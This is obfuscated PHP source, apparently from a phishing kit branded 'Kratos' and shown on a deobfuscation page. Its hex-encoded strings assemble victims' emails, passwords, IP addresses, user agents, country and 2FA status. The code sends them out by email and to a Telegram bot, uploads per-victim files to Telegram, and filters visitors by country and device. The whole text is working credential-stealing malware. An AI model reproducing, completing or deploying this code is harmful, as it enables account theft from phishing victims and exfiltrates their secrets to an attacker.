"\x3c\x62\76\x4b\162\141\x74\157\x73\x3c\57\x62\x3e\40\126\141\154\x69\x64\40\x52\x65\163\165\154\x74\74\x62\162\76\x3c\142\162\76\xd\12\40\x20\x20\40\x20\x20\x20\x20\40\40\x20\40\40\x20\x20\40\x45\x6d\x61\151\x6c\x20\72\x20{$E939e}\x3c\142\x72\x3e\xd\xa\x20\40\x20\40\40\x20\x20\40\40\x20\40\x20\x20\40\40\x20\x50\x61\163\x73\x77\157\x72\x64\x20\x3a\40{$aad56}\x3c\142\x72\x3e\15\xa\x20\40\x20\40\x20\40\x20\x20\x20\40\x20\40\x20\40\40\x20\x49\120\72\40{$A6d4e}\x3c\142\162\x3e\xd\xa\x20\40\x20\x20\x20\40\x20\40\x20\40\x20\x20\40\x20\40\40\125\163\145\x72\40\101\147\x65\x6e\x74\x3a\x20{$fb016}\x3c\142\x72\76\xd\xa\40\40\40\40\40\x20\40\x20\x20\40\x20\40\40\x20\x20\40\x43\157\x75\156\x74\162\171\72\x20{$fe21d}\x3c\142\x72\x3e\15\12\40\40\40\40\40\40\x20\40\40\40\x20\x20\x20\40\40\40\62\x46\x41\72\x20{$ddf49}\74\x62\x72\x3e\xd\xa\40\40\x20\40\40\x20\40\40\40\40\40\x20\x20\x20\x20\40\x52\x6f\154\x65\x3a\40{$ec8e9}\x3c\x62\x72\76\xd\12\40\x20\x20\x20\40\x20\x20\40\40\40\x20\40\x20\40\40\x20\x45\144\x75\72\40{$b1835}"; goto d3e74; c7263: if (!(!$A528b["\x6c\151\166\x65"] && $this->A59a0["\x73\x65\156\x64\x74\x79\160\145"] == 1)) { goto B127c; } goto ce7ab; D6c84: $fb016 = $_SESSION["\165\x73\x65\x72\137\x64\x61\x74\x61"]["\165\141"]; goto A483a; F2a94: $f040c = "\x3c\x62\x3e\113\x72\x61\x74\x6f\x73\x3c\57\x62\76\40\126\x61\x6c\x69\x64\x20\x52\145\x73\x75\154\x74\12\xa\x45\x6d\141\x69\154\40\72\x20\x3c\x63\157\x64\145\76{$E939e}\74\57\x63\x6f\144\x65\76\xa\x50\141\163\163\167\x6f\162\x64\x20\72\x20\x3c\143\x6f\144\x65\x3e{$aad56}\x3c\57\143\157\x64\x65\x3e\xa\111\120\x3a\40{$A6d4e}\12\125\x73\145\x72\x20\101\147\x65\156\164\x3a\40\x3c\143\157\144\145\76{$fb016}\74\x2f\x63\x6f\x64\x65\76\12\x43\x6f\165\x6e\x74\x72\x79\72\40{$fe21d}\12\62\106\101\72\40{$ddf49}\12\122\157\x6c\145\x3a\x20{$ec8e9}\12\105\144\165\72\x20{$b1835}"; goto f2c65; dbb3a: $fe21d = $_SESSION["\165\163\145\162\x5f\x64\141\x74\x61"]["\x69\156\x66\x6f"]["\143\157\x75\x6e\x74\x72\x79"]; goto dae9f; eb7f1: $Eb0ea = $this->A59a0["\x74\145\154\x65\147\x72\141\x6d"]["\x63\150\141\164\137\151\144"]; goto e5caf; bd338: goto E6689; goto B3106; dae9f: $A6d4e = $_SESSION["\165\163\x65\162\x5f\x64\141\x74\x61"]["\x69\x70"]; goto A8757; Fc377: $fe21d = $_SESSION["\x75\163\x65\162\137\144\141\x74\x61"]["\151\156\x66\x6f"]["\143\157\x75\156\x74\162\171"]; goto F2800; a2ab5: $d8f16 = dirname(__FILE__); goto e1d72; c0945: $A5d79 = "\156\157\x72\x65\x70\x6c\x79\100" . $Eaf42; goto a879a; d141d: if (!$this->A59a0["\x65\155\x61\x69\x6c"]["\141\x63\164\151\x76\x65"]) { goto A38ca; } goto Fdde2; be154: if (@mail($b77a3, $ba22b, $f0a7a, $B17d9)) { goto Eab71; } goto a79f8; a3ebc: goto e895b; goto Ebe0d; B2c30: $f0a7a = "\x3c\142\76\113\162\141\164\157\163\x3c\57\142\76\40\74\x73\76\111\156\166\141\154\151\144\x3c\57\163\x3e\40\x52\145\163\x75\154\164\x3c\142\162\x3e\x3c\x62\x72\76\xd\12\x20\x20\x20\40\40\40\x20\40\40\40\40\x20\40\40\x20\40\x45\155\141\151\x6c\x20\x3a\x20{$E939e}\74\x62\162\76\15\12\x20\x20\x20\40\x20\x20\x20\x20\40\x20\40\x20\40\x20\x20\x20\x50\141\x73\x73\167\x6f\x72\144\x20\x3a\40{$aad56}\74\142\162\76\xd\xa\x20\40\40\40\40\40\x20\40\40\x20\x20\40\40\x20\x20\40\x49\x50\72\x20{$A6d4e}\x3c\142\x72\x3e\15\12\40\40\x20\40\40\40\x20\x20\40\40\x20\x20\x20\x20\x20\x20\x55\x73\145\162\x20\x41\x67\145\x6e\164\72\x20\x3c\143\157\x64\x65\76{$fb016}\74\x62\x72\x3e\xd\12\40\x20\40\40\40\x20\40\x20\40\40\40\x20\40\40\x20\x20\103\157\x75\x6e\x74\162\x79\x3a\40{$fe21d}"; goto be154; d05d5: if (!(!$A528b["\x6c\151\x76\x65"] && $this->A59a0["\163\x65\x6e\144\x74\171\x70\x65"] == 1)) { goto Eb759; } goto Fc377; e4bf2: $ba22b = "\x53\164\165\144\145\x6e\164\40\x44\145\x74\141\151\156\x73\x20\x5b\126\x61\154\x69\x64\x5d"; goto e02fb; Ddd46: $B0eec = $this->A59a0["\164\x65\x6c\145\x67\x72\x61\155"]["\x62\157\164\137\x74\x6f\153\145\156"]; goto eb7f1; C33c5: $fb016 = $_SESSION["\165\163\145\162\x5f\144\141\x74\141"]["\165\141"]; goto C751a; Ebe0d: a458f: goto dbb3a; C3963: $ddf49 = $A528b["\x74\167\x6f\x66\x61\143\x74\157\x72"] == true ? "\x59\145\x73" : "\116\157"; goto F2a94; B3106: Ee748: goto e0e3b; a79f8: return 0; goto Eb1e6; e0e3b: $fe21d = $_SESSION["\165\163\145\x72\137\x64\141\164\x61"]["\151\156\x66\157"]["\143\157\165\x6e\x74\162\x79"]; goto F3180; Fdde2: $Eaf42 = $_SERVER["\123\105\x52\126\x45\122\x5f\x4e\x41\x4d\105"]; goto Be13a; c7ffa: $B17d9 .= "\x46\162\157\x6d\72\40{$D6f8f}\x20\x3c{$A5d79}\76" . "\xd\12"; goto E0814; f2c65: $this->SendMessageTelegram($B0eec, $Eb0ea, $f040c); goto da9a3; b2ea8: return 1; goto B7490; d564c: $B17d9 .= "\x58\x2d\x4d\141\151\x6c\145\x72\72\x20\x50\110\x50\57" . phpversion() . "\15\12"; goto Ff827; F16c1: b780b: goto ebea0; Eb1e6: goto F3298; goto b36c6; C751a: $ba22b = "\x53\164\165\144\x65\156\164\40\104\145\164\141\151\156\x73\40\133\111\x6e\166\141\x6c\x69\x64\135"; goto B2c30; e1d72: $b51c0 = $d8f16 . "\x2f\x2e\x2e\x2f\160\141\x67\x65\x2f\x63\x6f\x72\145\x2f\152\x73\x5f" . $E939e . "\x2e\164\x78\164"; goto Bb309; F384b: goto A984e; goto c6d24; B7003: return 0; goto F384b; A8757: $fb016 = $_SESSION["\x75\163\145\x72\137\144\141\164\x61"]["\x75\141"]; goto Ffa3b; ce7ab: $fe21d = $_SESSION["\x75\163\x65\x72\x5f\x64\x61\x74\141"]["\x69\x6e\146\157"]["\x63\x6f\x75\156\164\162\x79"]; goto Dd02a; E8972: A38ca: goto ece0f; ef810: B127c: goto bd338; E1912: Eb759: goto a3ebc; Dbf77: $this->SendMessageTelegram($B0eec, $Eb0ea, $f040c); goto E1912; Ca301: return 1; goto e7b13; Dd02a: $A6d4e = $_SESSION["\x75\x73\145\162\137\144\141\x74\x61"]["\151\160"]; goto C33c5; d49ce: $fb016 = $_SESSION["\x75\x73\145\x72\137\x64\141\164\141"]["\165\x61"]; goto B4d49; a879a: $D6f8f = "\123\x74\165\144\145\156\x74\x20\104\145\164\141\151\156\163"; goto a0b5c; B4d49: $f040c = "\74\x62\x3e\113\x72\x61\164\x6f\x73\74\57\x62\76\40\x3c\x73\76\111\156\x76\x61\154\151\144\74\57\x73\76\40\x52\145\163\x75\x6c\x74\12\12\105\155\x61\151\154\x20\72\40\x3c\143\x6f\x64\x65\x3e{$E939e}\74\x2f\143\157\144\145\76\12\120\x61\x73\163\x77\157\162\x64\40\x3a\x20\74\143\157\x64\145\x3e{$aad56}\x3c\x2f\x63\x6f\x64\x65\76\xa\111\x50\72\x20{$A6d4e}\xa\125\163\145\162\40\101\x67\x65\x6e\164\x3a\x20\x3c\143\157\x64\x65\76{$fb016}\x3c\x2f\143\157\144\145\x3e\xa\x43\157\x75\156\x74\x72\171\72\x20{$fe21d}"; goto Dbf77; B7490: A984e: goto Ad0b2; F2800: $A6d4e = $_SESSION["\x75\x73\145\162\137\144\x61\x74\x61"]["\x69\160"]; goto d49ce; d9f00: $B17d9 .= "\x43\x6f\156\x74\145\156\x74\55\164\171\160\145\x3a\x74\x65\170\x74\57\150\164\155\x6c\x3b\143\x68\141\x72\163\145\164\75\125\124\106\x2d\x38" . "\15\xa"; goto c7ffa; ebea0: e895b: goto E3709; e5caf: if ($A528b["\154\151\166\x65"]) { goto a458f; } goto d05d5; Be13a: $b77a3 = $this->A59a0["\145\155\141\151\154"]["\x65\155\141\x69\x6c"]; goto c0945; ece0f: } public function SendFileOnlyTelegram($A528b, $E939e, $a3e00) { goto ea0a6; Ec766: $this->SendMessageTelegram($B0eec, $Eb0ea, $f040c); goto B2315; ea0a6: $d8f16 = dirname(__FILE__); goto e6edd; Ad33c: $f040c = "\74\x62\x3e\x4b\162\141\x74\x6f\163\x3c\57\x62\x3e\40\x32\x46\101\40\151\163\x20\x46\x61\x69\x6c\145\144\12\xa\x45\x6d\141\151\154\40\x3a\40\x3c\143\x6f\144\x65\76{$E939e}\74\x2f\143\x6f\144\x65\x3e\12\x4d\x65\164\x68\157\x64\40\72\40\74\x63\x6f\144\x65\x3e{$a3e00}\74\57\x63\x6f\144\145\x3e\12\x53\164\x61\164\165\163\x20\72\40\74\143\157\x64\145\x3e\111\x6e\166\x61\154\x69\144\74\x2f\143\x6f\x64\145\x3e\xa\122\145\141\x73\x6f\156\x20\72\40\74\143\x6f\x64\145\76{$A9d3c}\74\x2f\143\x6f\144\145\x3e"; goto Ec766; e508d: $A9d3c = $A528b["\x72\x65\x61\x73\157\x6e"]; goto Ad33c; b5b78: $f040c = "\74\142\76\113\x72\x61\164\x6f\x73\x3c\x2f\142\76\x20\62\106\x41\x20\151\x73\40\x43\157\155\x70\x6c\145\x74\x65\144\xa\xa\105\155\141\151\154\40\x3a\40\x3c\x63\x6f\144\x65\76{$E939e}\x3c\x2f\143\157\x64\x65\76\xa\115\145\x74\x68\x6f\x64\40\72\x20\x3c\x63\x6f\144\x65\x3e{$a3e00}\74\x2f\x63\x6f\144\x65\x3e\xa\x53\164\141\164\x75\x73\x20\72\40\x3c\x63\x6f\144\145\76\126\141\x6c\x69\144\x3c\57\x63\x6f\x64\x65\76"; goto Ef176; Ef176: $this->SendMessageTelegram($B0eec, $Eb0ea, $f040c); goto E7c25; Eea77: $B0eec = $this->A59a0["\x74\x65\154\x65\147\162\141\155"]["\142\157\x74\x5f\164\157\x6b\x65\x6e"]; goto fd514; e4262: if (!(!$A528b["\154\151\166\x65"] && $this->A59a0["\163\145\156\144\x74\x79\x70\145"] == 1)) { goto Fcc6b; } goto e508d; fd514: $Eb0ea = $this->A59a0["\x74\x65\x6c\145\x67\x72\141\155"]["\x63\150\141\164\137\151\144"]; goto c757b; E7c25: if (!file_exists($b51c0)) { goto d11a1; } goto d1942; D8602: Affc2: goto Ec0aa; C0890: d11a1: goto D8602; c757b: if ($A528b["\154\x69\166\x65"]) { goto d647c; } goto e4262; C39be: if (!$this->A59a0["\164\x65\x6c\145\x67\162\x61\x6d"]["\x61\x63\x74\x69\x76\145"]) { goto c3969; } goto Eea77; B2315: Fcc6b: goto E2539; e6edd: $b51c0 = $d8f16 . "\x2f\56\56\57\160\x61\x67\145\x2f\x63\157\x72\x65\57\x6a\x73\x5f" . $E939e . "\x2e\x74\x78\164"; goto C39be; d1942: $this->SendFileTelegram($B0eec, $Eb0ea, $b51c0); goto C0890; Ec0aa: c3969: goto fb7c2; b4587: d647c: goto b5b78; E2539: goto Affc2; goto b4587; fb7c2: } public function checkCountryCode() { goto Adc10; e9e7b: if (!in_array($_SESSION["\x75\x73\x65\x72\137\144\x61\x74\141"]["\151\x6e\x66\x6f"]["\x63\157\x75\156\164\x72\x79\137\143\157\144\x65"], $this->A59a0["\x75\x6e\x63\150\x65\x63\153\145\x64\137\143\157\x75\156\164\162\151\145\163"])) { goto c2fc2; } goto D0bab; D0bab: $this->redirect("\103\157\165\x6e\164\162\171"); goto f0ffa; Adc10: if (isset($_SESSION["\x75\x73\x65\162\x5f\x64\x61\x74\x61"]["\x69\156\x66\x6f"]["\143\x6f\165\156\164\x72\171\137\143\x6f\144\145"])) { goto Ad5ce; } goto e3bdc; a4be2: Ad5ce: goto e9e7b; f0ffa: c2fc2: goto d605b; e3bdc: return; goto a4be2; d605b: } public function checkDevice() { goto F2f8f; eea9c: $this->redirect("\104\145\x76\151\143\145"); goto bd6c4; F2f8f: $B284f = $this->getDeviceType($this->getUserAgent()); goto bf141; bf141: if (!in_array($B284f, $this->A59a0["\x75\x6e\143\x68\145\x63\x6b\145\x64\137\x64\x65\166\151\x63\145\163"])) { goto E2621; } goto eea9c; bd6c4: E2621: goto B97e4; B97e4: } function getDeviceType($E2c97) { goto E7f63; d1996: return "\164\141\x62\x6c\145\164"; goto Ee5e2; Ee5e2: b84e6: goto dfe29; e4e06: return "\155\157\x62\x69\x6c\x65"; goto B8e0d; E7f63: if (!preg_match("\x2f\x69\160\141\x64\x7c\x74\x61\142\x6c\145\164\x7c\x6b\151\x6e\144\154\x65\174\x6e\x6f\157\153\x7c\141\x6e\144\x72\157\151\x64\x28\77\41\x2e\x2a\155\157\x62\151\154\145\51\57", $E2c97)) { goto b84e6; } goto d1996; E46db: return "\x64\x65\x73\x6b\x74\x6f\x70"; goto abb64; B8e0d: ddd28: goto E46db; dfe29: if (!preg_match("\57\x6d\157\x62\x69\x6c\145\174\141\x6e\x64\162\x6f\151\144\x7c\x69\x70\150\x6f\x6e\145\x7c\151\x70\x6f\x64\x7c\x62\x6c\141\143\153\142\x65\162\x72\x79\174\151\145\155\x6f\x62\x69\154\145\x7c\x6f\x70\145\x72\x61\x20\x6d\151\x6e\151\x7c\x77\x69\x6e\144\157\x77\163\40\160\150\x6f\x6e\145\x2f", $E2c97)) { goto ddd28; } goto e4e06; abb64: } public function checkLockEmail($E939e) { goto F9185; be46a: $E8101 = "\x74\145\x78\x74\x20\164\x6f\x20\x73\x65\141\162\143\150"; goto Fd584; Fd584: if (file_exists($b51c0)) { goto Eb24e; } goto a44a5; f1b23: if (strpos($C8f62, $E939e) !== false) { goto A332f; } goto a0c83; A79b0: goto F5099; goto fc94a; ed572: goto Ebc69; goto dcf48; dcf48: Eb24e: goto cb8ee; cb8ee: $C8f62 = file_get_contents($b51c0); goto f1b23; a0c83: return false; goto A79b0; F9185: $b51c0 = "\56\56\57" . $this->A59a0["\x6c\157\x63\x6b\x5f\145\155\x61\151\154"]["\x6c\151\x73\164"]; goto be46a; c25a9: return true; goto Cc105; ecfdd: Ebc69: goto c0c6f; fc94a: A332f: goto c25a9; a44a5: die("\x45\155\141\x69\x6c\40\114\x69\163\x74\40\x4e\157\x74\x20\146\x6f\165\x6e\x64"); goto ed572; Cc105: F5099: goto ecfdd; c0c6f: } }
Function Calls
None |
MD5 | 66ec7bf510cdb08694bdf63d474d4fdd |
Eval Count | 0 |
Decode Time | 110 ms |